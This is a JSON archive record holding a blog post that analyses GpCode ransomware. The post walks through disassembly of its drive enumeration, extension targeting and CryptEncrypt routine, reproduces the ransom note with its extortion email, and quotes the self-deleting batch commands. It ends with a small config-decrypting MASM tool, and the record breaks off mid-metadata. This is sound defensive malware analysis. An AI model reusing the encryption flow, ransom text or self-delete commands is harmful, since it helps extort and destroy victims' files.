{
	"id": "6bc338fe-0aef-4640-babd-0ec3c194c281",
	"created_at": "2026-04-06T01:29:28.674747Z",
	"updated_at": "2026-04-10T03:35:21.468904Z",
	"deleted_at": null,
	"sha1_hash": "f9a69181f77341e01f90c7e194451bcc97779044",
	"title": "GpCode Ransomware 2010 Simple Analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2269993,
	"plain_text": "GpCode Ransomware 2010 Simple Analysis\r\nArchived: 2026-04-06 00:44:16 UTC\r\nhttp://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html\r\nPage 1 of 18\r\nHi, firstly: sorry for my bad English. It's not my native language (I'M FRENCH).\r\nWell, I've wanted to make a post about this for a long time, but I was really too bored to have a look at it.\r\nFinally I did it, because no one seems to have done it before (or no one has the sample to work on?).\r\nSo let's start directly. If you want to know more about the GpCode story, have a look at this post:\r\nhttp://www.securelist.com/en/blog/333/GpCode_like_Ransomware_Is_Back\r\nSome technical information about the file:\r\nCRC32: CCDFBD05\r\nMD5: b14c45c1792038fd69b5c75e604242a3\r\nSHA1: 54ab323053f1138e5ccaa8f8afaa38cabca9491f\r\nPacker: UPX 0.89.6 - 1.02 / 1.05 - 2.90 -\u003e Markus \u0026 Laszlo\r\nCompiler: MASM/TASM\r\nFile size: 10,5 Kb (10 752 bytes)\r\nOEP: 00011790\r\nAlso known as: Trojan.Gpcoder.G (Symantec), GPcoder.j (McAfee), Trojan:Win32/Ransom.BQ (Microsoft), TROJ_RANSOM.EWQ (TrendMicro), Troj/Ransom-U (Sophos)\r\n\"Main place\" in Ollydbg:\r\nOEP: 0x401990 (when unpacked)\r\nText version:\r\n00401990 \u003e/$  E8 48FCFFFF   CALL 004015DD                      ;  1.004015DD\r\n00401995  |.  85C0          TEST EAX,EAX\r\n00401997  |.  0F84 80000000 JE 00401A1D                        ;  1.00401A1D\r\n0040199D  |.  68 2E304000   PUSH 40302E                        ; /MutexName = \"ilold\"\r\n004019A2  |.  6A 00         PUSH 0                             ; |Inheritable = FALSE\r\n004019A4  |.  68 01001F00   PUSH 1F0001                        ; |Access = 1F0001\r\n004019A9  |.  E8 12010000   CALL 00401AC0                      ; \\OpenMutexA\r\n004019AE  |.  85C0          TEST EAX,EAX\r\n004019B0  |.  75 6B         JNZ SHORT 00401A1D                 ;  1.00401A1D\r\n004019B2  |.  68 2E304000   PUSH 40302E                        ; /MutexName = \"ilold\"\r\n004019B7  |.  6A 00         PUSH 0                             ; |InitialOwner = FALSE\r\n004019B9  |.  6A 00         PUSH 0                             ; |pSecurity = NULL\r\n004019BB  |.  E8 9A000000   CALL 00401A5A                      ; \\CreateMutexA\r\n004019C0  |.  E8 3BF6FFFF   CALL 00401000                      ;  1.00401000\r\n004019C5  |.  85C0          TEST EAX,EAX\r\n004019C7  |.  74 54         JE SHORT 00401A1D                  ;  1.00401A1D\r\n004019C9  |.  E8 A3F8FFFF   CALL 00401271                      ;  1.00401271\r\n004019CE  |.  33C0          XOR EAX,EAX\r\n004019D0  |.  50            PUSH EAX                           ; /pThreadId =\u003e NULL\r\n004019D1  |.  50            PUSH EAX                           ; |CreationFlags =\u003e 0\r\n004019D2  |.  50            PUSH EAX                           ; |pThreadParm =\u003e NULL\r\n004019D3  |.  68 35134000   PUSH 401335                        ; |ThreadFunction = 1.00401335\r\n004019D8  |.  50            PUSH EAX                           ; |StackSize =\u003e 0\r\n004019D9  |.  50            PUSH EAX                           ; |pSecurity =\u003e NULL\r\n004019DA  |.  E8 81000000   CALL 00401A60                      ; \\CreateThread\r\n004019DF  |.  6A 01         PUSH 1                             ; /ErrorMode = SEM_FAILCRITICALERRORS\r\n004019E1  |.  E8 EC000000   CALL 00401AD2                      ; \\SetErrorMode\r\n004019E6  |.  E8 A5000000   CALL 00401A90                      ; [GetLogicalDrives\r\n004019EB  |.  B9 19000000   MOV ECX,19\r\n004019F0  |\u003e  BB 01000000   /MOV EBX,1\r\n004019F5  |.  D3E3          |SHL EBX,CL\r\n004019F7  |.  23D8          |AND EBX,EAX\r\n004019F9  |.  74 1F         |JE SHORT 00401A1A                 ;  1.00401A1A\r\n004019FB  |.  80C1 41       |ADD CL,41\r\n004019FE  |.  880D 70304000 |MOV BYTE PTR DS:[403070],CL\r\n00401A04  |.  80E9 41       |SUB CL,41\r\n00401A07  |.  C705 71304000\u003e|MOV DWORD PTR DS:[403071],2A5C3A\r\n00401A11  |.  50            |PUSH EAX\r\n00401A12  |.  51            |PUSH ECX\r\n00401A13  |.  E8 EEFDFFFF   |CALL 00401806                     ;  1.00401806\r\n00401A18  |.  59            |POP ECX\r\n00401A19  |.  58            |POP EAX\r\n00401A1A  |\u003e  49            |DEC ECX\r\n00401A1B  |.^ 7D D3         \\JGE SHORT 004019F0                ;  1.004019F0\r\n00401A1D  |\u003e  68 F4010000   PUSH 1F4                           ; /Timeout = 500. ms\r\n00401A22  |.  E8 BD000000   CALL 00401AE4                      ; \\Sleep\r\n00401A27  |.  833D 34304000\u003eCMP DWORD PTR DS:[403034],1\r\n00401A2E  |.^ 75 ED         JNZ SHORT 00401A1D                 ;  1.00401A1D\r\n00401A30  |.  E8 90F6FFFF   CALL 004010C5                      ;  1.004010C5\r\n00401A35  |.  E8 33FDFFFF   CALL 0040176D                      ;  1.0040176D\r\n00401A3A  |.  6A 00         PUSH 0                             ; /ExitCode = 0\r\n00401A3C  \\.  E8 25000000   CALL 00401A66                      ; \\ExitProcess\r\nIn the first call, GpCode loads and locks a resource:\r\n004015F4  |.  6A 0A         PUSH 0A                            ; /ResourceType = RT_RCDATA\r\n004015F6  |.  68 65304000   PUSH 403065                        ; |ResourceName = \"cfg\"\r\n004015FB  |.  6A 00         PUSH 0                             ; |hModule = NULL\r\n004015FD  |.  E8 7C040000   CALL 00401A7E                      ; \\FindResourceA\r\nScreenshot of the grabbed data:\r\nAccording to the first bytes this is not a valid PE file (so why move it?).\r\nWell:\r\n0040160D  |.  50            PUSH EAX                           ; /hResource\r\n0040160E  |.  6A 00         PUSH 0                             ; |hModule = NULL\r\n00401610  |.  E8 C9040000   CALL 00401ADE                      ; \\SizeofResource\r\n00401615  |.  0BC0          OR EAX,EAX\r\n00401617  |.  75 04         JNZ SHORT 0040161D                 ;  GpCode.0040161D\r\n00401619  |.  33C0          XOR EAX,EAX\r\n0040161B  |.  C9            LEAVE\r\n0040161C  |.  C3            RETN\r\nHere it grabs the size of the resource; eax will contain 0000055D (1373).\r\nNote: the Resource Hacker screenshot also shows the size.\r\nWhen that's done, it gets free memory with GlobalAlloc (at eax: 00175158) with the specified size, 55D:\r\n00401646  |.  FF75 F0       PUSH DWORD PTR SS:[EBP-10]          ; /MemSize\r\n00401649  |.  6A 40         PUSH 40                             ; |Flags = GPTR\r\n0040164B  |.  E8 52040000   CALL 00401AA2                       ; \\GlobalAlloc\r\n00401650  |.  0BC0          OR EAX,EAX\r\nThen it copies the resource to that memory (00175158):\r\n0040165D  |.  FF75 F0       PUSH DWORD PTR SS:[EBP-10]          ; /Length = 55D (1373.)\r\n00401660  |.  FF75 FC       PUSH DWORD PTR SS:[EBP-4]           ; |Source = GpCode.0040F474\r\n00401663  |.  FF75 EC       PUSH DWORD PTR SS:[EBP-14]          ; |Destination = 00175158\r\n00401666  |.  E8 61040000   CALL 00401ACC                       ; \\RtlMoveMemory\r\n0040166B  |.  FF75 F8       PUSH DWORD PTR SS:[EBP-8]           ; /hResource  = 0040F474\r\n0040166E  |.  E8 11040000   CALL 00401A84                       ; \\FreeResource\r\n00401673  |.  8B5D EC       MOV EBX,DWORD PTR SS:[EBP-14]\r\n00401676  |.  6A 10         PUSH 10                             ; /Length = 10 (16.)\r\n00401678  |.  53            PUSH EBX                            ; |Source = 00175158\r\n00401679  |.  68 70444000   PUSH 404470                         ; |Destination = GpCode.00404470\r\n0040167E  |.  E8 49040000   CALL 00401ACC                       ; \\RtlMoveMemory\r\nJust after doing this, it goes to another call.\r\nIn this call it decrypts the data contained at 00175158 (it looks interesting now).\r\nAt the end of the loop:\r\nWe get clear text, including the list of extensions which will be encrypted:\r\n- .jpg\r\n- .jpeg\r\n- .psd\r\n- .cdr\r\n- .dwg\r\n- .max\r\n- .mov\r\n- .m2v\r\n- .3gp\r\n- .doc\r\n- .docx\r\n- .xls\r\n- .xlsx\r\n- .ppt\r\n- .pptx\r\n- .rar\r\n- .zip\r\n- .mdb\r\n- .mp3\r\n- .cer\r\n- .p12\r\n- .pfx\r\n- .kwm\r\n- .pwm\r\n- .txt\r\n- .pdf\r\n- .avi\r\n- .flv\r\n- .lnk\r\n- .bmp\r\n- .1cd\r\n- .md\r\n- .mdf\r\n- .dbf\r\n- .mdb\r\n- .odt\r\n- .vob\r\n- .ifo\r\n- .mpeg\r\n- .mpg\r\n- .doc\r\n- .docx\r\n- .xls\r\n- .xlsx\r\n.bat, .sys, .exe and .ini files will not be attacked, because the system uses all of them, and the goal of GpCode is not to crash the system.\r\nSo it returns to the call and moves the memory again to another place, this time selecting a block of bytes (398) and moving it to 00175BB8:\r\n004016CD  |.  57            PUSH EDI                            ; /Length = 398 (920.)\r\n004016CE  |.  53            PUSH EBX                            ; |Source = 00175172\r\n004016CF  |.  FF35 88444000 PUSH DWORD PTR DS:[404488]          ; |Destination = 00175BB8\r\n004016D5  |.  E8 F2030000   CALL 00401ACC                       ; \\RtlMoveMemory\r\nBlock of 398 bytes:\r\n00175BA8                       Attention!!!    ..All your personal files (\r\n00175BE8  photo, documents, texts, databases, certificates, kwm-files, vid\r\n00175C28  eo) have been encrypted by a very strong cypher RSA-1024. The or\r\n00175C68  iginal files are deleted.  You can check this by yourself - just\r\n00175CA8   look for files in all folders... There is no possibility to dec\r\n00175CE8  rypt these files without a special decrypt program! Nobody can h\r\n00175D28  elp you - even don't try to find another method or tell anybody.\r\n00175D68   Also after n days all encrypted files will be completely delete\r\n00175DA8  d and you will have no chance to get it back. .. We can help to\r\n00175DE8  solve this task for 120$ via wire transfer (bank transfer SWIFT/\r\n00175E28  IBAN). And remember: any harmful or bad words to our side will b\r\n00175E68  e a reason for ingoring your message and nothing will be done...\r\n00175EA8  For details you have to send your request on this e-mail (attach\r\n00175EE8   to message a full serial key shown below in this 'how to..' fil\r\n00175F28  e on desktop):   datafinder@fastmail.fm\r\nAfterwards, another block is moved (271 bytes):\r\n0040170A  |.  FF35 80444000 PUSH DWORD PTR DS:[404480]          ; /Length = 10F (271.)\r\n00401710  |.  53            PUSH EBX                            ; |Source = 00175512\r\n00401711  |.  FF35 8C444000 PUSH DWORD PTR DS:[40448C]          ; |Destination = 001756C0\r\n00401717  |.  E8 B0030000   CALL 00401ACC                       ; \\RtlMoveMemory\r\nThe block of bytes moved, you guessed it:\r\n001756C0  *.jpg.*.jpeg.*.psd.*.cdr.*.dwg.*.max.*.mov.*.m2v.*.3gp.*.doc.*.d\r\n00175700  ocx.*.xls.*.xlsx.*.ppt.*.pptx.*.rar.*.zip.*.mdb.*.mp3.*.cer.*.p1\r\n00175740  2.*.pfx.*.kwm.*.pwm.*.txt.*.pdf.*.avi.*.flv.*.lnk.*.bmp.*.1cd.*.\r\n00175780  md.*.mdf.*.dbf.*.mdb.*.odt.*.vob.*.ifo,.*.mpeg.*.mpg.*.doc.*.doc\r\n001757C0  x.*.xls.*.xlsx\r\nAfter that it returns to the \"Main place\" (screenshot 1) and creates the mutex \"ilold\":\r\n004019B2  |.  68 2E304000   PUSH 40302E                         ; /MutexName = \"ilold\"\r\n004019B7  |.  6A 00         PUSH 0                              ; |InitialOwner = FALSE\r\n004019B9  |.  6A 00         PUSH 0                              ; |pSecurity = NULL\r\n004019BB  |.  E8 9A000000   CALL 00401A5A                       ; \\CreateMutexA\r\nThen it goes to a call.. a crypto procedure:\r\n004019C0  |.  E8 3BF6FFFF   CALL 00401000                       ;  GpCode.00401000\r\nWell, I'm not very good at explaining crypto stuff, so I will make it simple: it generates a key, then stores it and uses GlobalAlloc to get a free memory place.\r\nI will give you some screenshots; if you have a better level than me you will surely understand.\r\n00401050  |.  E8 DD0A0000   CALL 00401B32                       ;  \u003cJMP.\u0026advapi32.CryptExportKey\u003e\r\n00401055  |.  FF35 A2444000 PUSH DWORD PTR DS:[4044A2]          ; /MemSize = 2C (44.)\r\n0040105B  |.  6A 40         PUSH 40                             ; |Flags = GPTR\r\n0040105D  |.  E8 400A0000   CALL 00401AA2                       ; \\GlobalAlloc\r\nHex dump of address 4044A2:\r\nThen it also gets free memory at 0017CD30:\r\n004010A0  |.  E8 A50A0000   CALL 00401B4A                       ;  \u003cJMP.\u0026advapi32.CryptSetKeyParam\u003e\r\n004010A5  |.  68 00000100   PUSH 10000                          ; /MemSize = 10000 (65536.)\r\n004010AA  |.  6A 40         PUSH 40                             ; |Flags = GPTR\r\n004010AC  |.  E8 F1090000   CALL 00401AA2                       ; \\GlobalAlloc\r\n004010B1  |.  0BC0          OR EAX,EAX\r\nIt takes 44 bytes from 0017B928 and moves them to 008F0020:\r\n004012D2  |.  FF35 A2444000 PUSH DWORD PTR DS:[4044A2]          ; /Length = 2C (44.)\r\n004012D8  |.  FF35 A6444000 PUSH DWORD PTR DS:[4044A6]          ; |Source = 0017B928\r\n004012DE  |.  FF35 C8444000 PUSH DWORD PTR DS:[4044C8]          ; |Destination = 008F0020\r\n004012E4  |.  E8 E3070000   CALL 00401ACC                       ; \\RtlMoveMemory\r\nAnd what do we see in the source? A call to CryptEncrypt, used for RSA:\r\n0040130C  |.  E8 1B080000   CALL 00401B2C                       ;  \u003cJMP.\u0026advapi32.CryptEncrypt\u003e\r\nAfter that it creates a thread and retrieves a bitmask representing the currently available disk drives.\r\nThen we enter a loop.\r\nThe return value from GetLogicalDrives is a bitmask representing the currently available disk drives.\r\nBit position 0 (the least-significant bit) is drive A, bit position 1 is drive B, bit position 2 is drive C, and so on.\r\nIn the loop, we start from 25 (drive Z), and when a drive is found, for example 'D' (which has position 3), the \"jump if equal\" is not taken: we enter a call that *does something*, then return to the loop to continue with the next letters (position 2: \"C\").\r\nI name this place \"Core\", because everything about the data is decided inside this procedure.\r\nLet's see what it does with 'D':\r\n00401806  /$  55            PUSH EBP\r\n00401807  |.  8BEC          MOV EBP,ESP\r\n00401809  |.  81EC 44010000 SUB ESP,144\r\n0040180F  |.  8D85 BCFEFFFF LEA EAX,DWORD PTR SS:[EBP-144]\r\n00401815  |.  50            PUSH EAX                            ; /pFindFileData\r\n00401816  |.  68 70304000   PUSH 403070                         ; |FileName = \"D:\\\\*\"\r\n0040181B  |.  E8 52020000   CALL 00401A72                       ; \\FindFirstFileA\r\n00401820  |.  40            INC EAX\r\n00401821  |.  0F84 67010000 JE 0040198E                         ;  1.0040198E\r\nIt does... NOTHiNG.\r\n'D' was my CD drive and there was no CD inside (FindFirstFileA is an explicit API, right?), so eax returns FFFFFFFF.\r\nIt takes the jump, which leaves the procedure:\r\n0040198E  |\u003e \\C9            LEAVE\r\n0040198F  \\.  C3            RETN\r\nBut what about my local disk 'C', which is next?\r\nThere is a blacklisted file, \"HOW TO DECRYPT FILES.txt\".\r\nIf the ransomware finds this file, it quits the routine:\r\n004018CF  |.  53            |PUSH EBX                           ; /String2\r\n004018D0  |.  68 38304000   |PUSH 403038                        ; |String1 = \"HOW TO DECRYPT FILES.txt\"\r\n004018D5  |.  E8 22020000   |CALL 00401AFC                      ; \\lstrcmpiA\r\n004018DA  |.  85C0          |TEST EAX,EAX\r\n004018DC  |.  0F84 8D000000 |JE 0040196F                        ;  1.0040196F\r\nIt does another check after that, but we don't know which file yet:\r\n004018CF  |.  53            |PUSH EBX                           ; /String2\r\n004018D0  |.  68 38304000   |PUSH 403038                        ; |String1 = \"HOW TO DECRYPT FILES.txt\"\r\n004018D5  |.  E8 22020000   |CALL 00401AFC                      ; \\lstrcmpiA\r\n004018DA  |.  85C0          |TEST EAX,EAX\r\n004018DC  |.  0F84 8D000000 |JE 0040196F                        ;  1.0040196F\r\n004018E8  |.  53            |PUSH EBX                           ; /String2\r\n004018E9  |.  68 644F4000   |PUSH 404F64                        ; |String1 = \"\"\r\n004018EE  |.  E8 09020000   |CALL 00401AFC                      ; \\lstrcmpiA\r\nThat would be bad if the ransomware encoded its own stuff -.^ (to be continued)\r\nAfter this check, the ransomware 'creates' a path to the file:\r\n004018FD  |.  50            |PUSH EAX                           ; /StringToAdd = \"AUTOEXEC.BAT\"\r\n004018FE  |.  68 70354000   |PUSH 403570                        ; |ConcatString = \"C:\\\\AUTOEXEC.BAT\"\r\n00401903  |.  E8 E8010000   |CALL 00401AF0                      ; \\lstrcatA\r\nAnd then it checks the extension of the file:\r\n00401914  |\u003e /51            |/PUSH ECX\r\n00401915  |. |53            ||PUSH EBX                          ; /Wildcard\r\n00401916  |. |68 70354000   ||PUSH 403570                       ; |Path = \"C:\\\\AUTOEXEC.BAT\"\r\n0040191B  |. |E8 36020000   ||CALL 00401B56                     ; \\PathMatchSpecA\r\n00401920  |. |83F8 01       ||CMP EAX,1\r\n00401923  |. |75 03         ||JNZ SHORT 00401928                ;  1.00401928\r\n00401925  |. |59            ||POP ECX\r\n00401926  |. |EB 10         ||JMP SHORT 00401938                ;  1.00401938\r\n00401928  |\u003e |53            ||PUSH EBX                          ; /String\r\n00401929  |. |E8 E0010000   ||CALL 00401B0E                     ; \\lstrlenA\r\n0040192E  |. |03D8          ||ADD EBX,EAX\r\n00401930  |. |83C3 01       ||ADD EBX,1\r\n00401933  |. |59            ||POP ECX\r\n00401934  |.^\\E2 DE         |\\LOOPD SHORT 00401914              ;  1.00401914\r\nThe \".bat\" extension is not in the 'list' of extensions to crypt, so it simply leaves with this line:\r\n00401936  |. /EB 37         |JMP SHORT 0040196F                 ;  1.0040196F\r\nAnd proceeds to the next file:\r\n00401975  |.  50            |PUSH EAX                           ; /pFindFileData\r\n00401976  |.  FF75 FA       |PUSH DWORD PTR SS:[EBP-6]          ; |hFile\r\n00401979  |.  E8 FA000000   |CALL 00401A78                      ; \\FindNextFileA\r\n0040197E  |.  85C0          |TEST EAX,EAX\r\n00401980  |.^ 0F85 A5FEFFFF \\JNZ 0040182B                       ;  1.0040182B\r\n0040197E  |.  85C0          |TEST EAX,EAX\r\n00401986  |.  FF75 FA       PUSH DWORD PTR SS:[EBP-6]           ; /hSearch\r\n00401989  |.  E8 DE000000   CALL 00401A6C                       ; \\FindClose\r\n0040198E  |\u003e  C9            LEAVE\r\n0040198F  \\.  C3            RETN\r\nTo test the procedure I made a txt file called \"AUTOEXEC.txt\".\r\nThis time it detects the extension .txt and doesn't take the conditional jump:\r\n00401923  |. /75 03         ||JNZ SHORT 00401928                ;  1.00401928\r\n00401925  |. |59            ||POP ECX\r\n00401926  |. |EB 10         ||JMP SHORT 00401938                ;  1.00401938\r\nIt jumps here:\r\n00401938  |\u003e \\68 70354000   |PUSH 403570                        ; /Arg1 = 00403570 ASCII \"C:\\\\AUTOEXEC.txt\"\r\n0040193D  |.  E8 9CF7FFFF   |CALL 004010DE                      ; \\1.004010DE\r\n00401942  |.  68 70354000   |PUSH 403570                        ; /String2 = \"C:\\\\AUTOEXEC.txt\"\r\n00401947  |.  68 703A4000   |PUSH 403A70                        ; |String1 = 1.00403A70\r\n0040194C  |.  E8 B1010000   |CALL 00401B02                      ; \\lstrcpyA\r\n00401951  |.  68 00304000   |PUSH 403000                        ; /StringToAdd = \".ENCODED\"\r\n00401956  |.  68 703A4000   |PUSH 403A70                        ; |ConcatString = \"\"\r\n0040195B  |.  E8 90010000   |CALL 00401AF0                      ; \\lstrcatA\r\n00401960  |.  68 703A4000   |PUSH 403A70                        ; /NewName = \"\"\r\n00401965  |.  68 70354000   |PUSH 403570                        ; |ExistingName = \"C:\\\\AUTOEXEC.txt\"\r\n0040196A  |.  E8 4B010000   |CALL 00401ABA                      ; \\MoveFileA\r\nWhat do we see?\r\nIt takes the full path to the file, then enters a procedure and does something.\r\nAfter the return, it renames the file with the extension \".ENCODED\" and continues to check for other files.\r\nLet's enter the call now:\r\n00401109  |.  6A 00         PUSH 0                              ; /pFileSizeHigh = NULL\r\n0040110B  |.  FF75 FC       PUSH DWORD PTR SS:[EBP-4]           ; |hFile\r\n0040110E  |.  E8 77090000   CALL 00401A8A                       ; \\GetFileSize\r\n00401113  |.  8945 F8       MOV DWORD PTR SS:[EBP-8],EAX\r\n00401116  |.  83F8 10       CMP EAX,10\r\n00401119  |.  0F8C 41010000 JL 00401260                         ;  1.00401260\r\nThe interesting thing is this size check: files under 11 bytes are not crypted, like my AUTOEXEC.txt which has 4 bytes (\"test\").\r\nIt takes the conditional jump and we are here:\r\n00401260  |\u003e \\FF75 FC       PUSH DWORD PTR SS:[EBP-4]           ; /hObject = 00000054\r\n00401263  |.  E8 E6070000   CALL 00401A4E                       ; \\CloseHandle\r\n00401268  |.  B8 01000000   MOV EAX,1\r\n0040126D  |.  C9            LEAVE\r\n0040126E  \\.  C2 0400       RETN 4\r\nIt closes the handle and returns to the \"core\"; nothing was encoded inside the txt.\r\nI think it doesn't crypt files under 10 bytes to win time: 10-byte files are useless, and it needs to crypt data as fast as possible.\r\nIt adds the extension .ENCODED anyway to the files under 10 bytes [iS THAT A BUG????] (a basic victim will think everything is crypted, right?).\r\nSo it continues to proceed with the next files, and finally, after some attempts, the 2nd thread starts:\r\n00401335  /$  FF35 92444000 PUSH DWORD PTR DS:[404492]          ; /Time = 0,\r\n0040133B  |.  E8 A4070000   CALL \u003cJMP.\u0026KERNEL32.Sleep\u003e          ; \\KERNEL32.Sleep\r\n00401340  |.  E8 0B000000   CALL 00401350\r\n00401345  |.  C705 34304000 MOV DWORD PTR DS:[403034],1\r\n0040134F  \\.  C3            RETN\r\n00401350  /$  55            PUSH EBP\r\nGpCode will create a TXT file on your desktop, using the SHGetSpecialFolderPathA API to find the desktop path.\r\nIt creates and writes a file called \"HOW TO DECRYPT FILES.txt\".\r\nThen it goes into a loop for the RSA key and writes it at the end of the file (HOW TO DECRYPT FILES.txt).\r\nExample of the file made:\r\n           Attention!!!\r\nAll your personal files (photo, documents, texts, databases, certificates, kwm-files, video) have been encrypted by a very strong cypher RSA-1024. The original files are deleted.  You can check this by yourself - just look for files in all folders.\r\n There is no possibility to decrypt these files without a special decrypt program! Nobody can help you - even don't try to find another method or tell anybody. Also after n days all encrypted files will be completely deleted and you will have no chance to get it back.\r\n We can help to solve this task for 120$ via wire transfer (bank transfer SWIFT/IBAN). And remember: any harmful or bad words to our side will be a reason for ingoring your message and nothing will be done.\r\nFor details you have to send your request on this e-mail (attach to message a full serial key shown below in this 'how to..' file on desktop):   datafinder@fastmail.fm\r\n2334CC172CF6F6CCEA5F1090E2B2990FA2A933CD099B9295B0E3750A9CA26D89E18B2143E1899B761AE81C44DD164F6B36C81340A8943918\r\n6CE8BE3590ED19C04969F7C4FE074D0C3976788135781AE889A72FA349A8FF0AE749E26E77FC065D251C389115C4AA98D4C4554CA2FFE9B8\r\nAfter that it changes your wallpaper.\r\nResource hacker:\r\nIt searches the bitmap resource and drops it in the %temp% folder with a random name.\r\nThen it calls an API to set it as the wallpaper, with the stretch option, to fill your entire screen.\r\nDesktop:\r\nThen it continues to search for other files to crypt.\r\nAnd now we know the dropped bitmap is the second blacklisted file.\r\nLet's follow this \"brndlog.txt\" located in:\r\nC:\\\\Documents and Settings\\\\Administrateur\\\\Application Data\\\\Microsoft\\\\Internet Explorer\r\nIt creates a handle to the file with GENERIC_READ and uses GetFileSize to check whether it should encrypt it or not.\r\nAfter the size check, it uses the SetFilePointer function, which stores the file pointer in two LONG values.\r\nThen it reads the file and stores the data in a buffer, then calls CryptEncrypt on the stored data.\r\nAfter that it writes the file (brndlog.txt) with the new data.\r\nNow it returns to the core to add the extension .ENCODED and proceed to the next file.\r\nOnce all drives are \"crypted\", it quits the \"core\" and returns to the \"main place\".\r\nIt enters two procedures and calls an API to close the program.\r\nThe first procedure:\r\nIt destroys the key and releases the handle of the CSP.\r\nSecond procedure:\r\nIt creates a file called \"ntfs_system.bat\" (in the same folder as the ransomware) which contains:\r\ndel \"C:\\\\Documents and Settings\\\\Administrateur\\\\Bureau\\\\1.exe\"\r\ndel %0\r\nAnd executes it, then calls the ExitProcess API to close the program.\r\nAnd \"ntfs_system.bat\" will delete GpCode from our system.\r\nAll your data is crypted with an executable of 25Kb and there is no possibility to recover it until paying the ransom...\r\nThe malware author claims in the txt file:\r\n\"after n days all encrypted files will be completely deleted and you will have no chance to get it back.\"\r\nAs we have seen, there is absolutely nothing inside the code to do such an action.\r\nIt says that just to scare users, pushing them into buying the 'special decrypt program'.\r\nAlso, people should be aware of the problem and should recognize GpCode from the first and second \"warnings\" that appear on the screen.\r\nPushing the Reset/Power button of your PC can save a significant amount of your valuable data,\r\nand GpCode doesn't create a startup key, so you can boot safely after an infection.\r\nConclusion: back up your data from time to time in a safe place, and don't forget to unplug the storage device which contains the saved data.\r\nBonus: a tiny, useless app which reads the cfg file from GpCode :)\r\n.486\r\n.model  flat, stdcall\r\noption  casemap :none   ; case sensitive\r\ninclude windows.inc\r\nuselib  MACRO   libname\r\n    include     libname.inc\r\n    includelib  libname.lib\r\nENDM\r\nuselib  user32\r\nuselib  kernel32\r\nDlgProc     PROTO :DWORD,:DWORD,:DWORD,:DWORD\r\nIDC_OK          equ 1003\r\nIDC_IDCANCEL    equ 1004\r\ncfg             equ 1\r\n.data?\r\nhInstance       dd      ?   ;dd can be written as dword\r\nbuffer1 db 9999 dup(?)\r\nbuffer2 db 9999 dup(?)\r\nbuffer3 db 256 dup(?)\r\nbuffer4 db 256 dup(?)\r\nnSize dd     ?\r\npM  dd     ?\r\n.code\r\nstart:\r\n    invoke  GetModuleHandle, NULL\r\n    mov hInstance, eax\r\n    invoke  DialogBoxParam, hInstance, 101, 0, ADDR DlgProc, 0\r\n    invoke  ExitProcess, eax\r\nDlgProc proc    hWin    :DWORD,\r\n        uMsg    :DWORD,\r\n        wParam  :DWORD,\r\n        lParam  :DWORD\r\n    .if uMsg == WM_COMMAND\r\n        .if wParam == IDC_OK\r\n INVOKE FindResource,0, cfg, RT_RCDATA\r\n push eax\r\n INVOKE SizeofResource,0, eax\r\n mov nSize, eax\r\n pop eax\r\n INVOKE LoadResource,0, eax\r\n INVOKE LockResource, eax\r\n mov esi, eax\r\n mov eax, nSize\r\n add eax, SIZEOF nSize\r\n INVOKE GlobalAlloc, GPTR, eax\r\n mov pM, eax\r\n mov ecx, nSize\r\n mov dword ptr [eax], ecx\r\n add eax, SIZEOF nSize\r\n mov edi, eax\r\n rep movsb\r\n        PUSH 55Dh\r\n        PUSH eax\r\n        PUSH offset buffer1\r\n        CALL RtlMoveMemory\r\n        invoke FreeResource,eax\r\n        mov ebx,offset buffer1\r\n        PUSH 10h\r\n        PUSH ebx\r\n        PUSH offset buffer2\r\n        CALL RtlMoveMemory\r\n        ADD EBX,010h\r\n        MOV EAX,nSize\r\n        SUB EAX,010h\r\n        PUSH EAX\r\n        PUSH EBX\r\n        CALL decrypt\r\n        MOV AL,BYTE PTR DS:[EBX]\r\n        MOV BYTE PTR DS:[buffer3],AL\r\n        ADD EBX,1\r\n        MOV AL,BYTE PTR DS:[EBX]\r\n        MOV BYTE PTR DS:[buffer3+1],AL\r\n        ADD EBX,1\r\n        MOV EAX,DWORD PTR DS:[EBX]\r\n        MOV DWORD PTR DS:[buffer3+2],EAX\r\n        ADD EBX,8\r\n        MOV ECX,DWORD PTR DS:[EBX]\r\n        invoke SetDlgItemText,hWin,1002,ebx\r\n         pop esi\r\n        .elseif wParam == IDC_IDCANCEL\r\n            invoke EndDialog,hWin,0\r\n        .endif\r\n    .elseif uMsg == WM_CLOSE\r\n        invoke  EndDialog,hWin,0\r\n    .endif\r\n    xor eax,eax\r\n    ret\r\nDlgProc endp\r\ndecrypt proc\r\n        PUSHAD\r\n        MOV ESI,EBX\r\n        MOV EDI,ESI\r\n        XOR EDX,EDX\r\n        MOV ECX,EAX\r\n@gpcode_00401755:\r\n        CMP EDX,010h\r\n        JNZ @gpcode_0040175C\r\n        XOR EDX,EDX\r\n@gpcode_0040175C:\r\n        LODS BYTE PTR DS:[ESI]\r\n        XOR AL,BYTE PTR DS:[EDX+buffer2]\r\n        STOS BYTE PTR ES:[EDI]\r\n        INC EDX\r\n        DEC ECX\r\n        JNZ @gpcode_00401755\r\n        POPAD\r\n    RET\r\ndecrypt endp\r\nend start\r\nResource file:\r\n;This Resource Script was generated by WinAsm Studio.\r\n#define IDC_OK 1003\r\n#define IDC_CANCEL 1004\r\n1 RCDATA DISCARDABLE \"gpcode.data\" ;this is your cfg file ripped from GpCode\r\n101 DIALOGEX 0,0,294,170\r\nCAPTION \"GpCode...\"\r\nFONT 8,\"Tahoma\"\r\nSTYLE 0x80c80880\r\nEXSTYLE 0x00000000\r\nBEGIN\r\n    CONTROL \"Read RC_DATA \u003e cfg\",IDC_OK,\"Button\",0x10000001,3,135,287,14,0x00000000\r\n    CONTROL \"Quit\",IDC_CANCEL,\"Button\",0x10000000,3,154,287,14,0x00000000\r\n    CONTROL \"\",1002,\"Edit\",0x10200044,3,3,287,130,0x00000200\r\nEND\r\nSource: http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html"
	],
	"report_names": [
		"gpcode-ransomware-2010-simple-analysis.html"
	],
	"threat_actors": [
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
